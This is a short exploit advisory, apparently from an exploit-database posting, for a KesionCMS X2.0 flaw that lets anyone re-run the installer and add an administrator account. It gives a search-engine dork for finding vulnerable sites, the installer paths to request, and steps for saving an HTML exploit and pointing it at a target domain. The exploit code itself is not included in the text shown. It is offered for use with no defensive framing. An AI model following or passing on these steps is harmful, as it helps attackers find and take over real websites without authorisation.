==================================================================================================================================== | # Title : KesionCMS X2.0 Reinstall Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | | # Vendor : https://www.kesion.com/ | | # Dork : Powered by KesionCMS | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /install/index.asp [+] http://127.0.0.1.com/install/?action=s4 = add your information to login [+] copy & past this exploit listed below into a text file and save it with ".html" extension [+] Exploit : [+] @t Line 09 & 16 change the domain name of target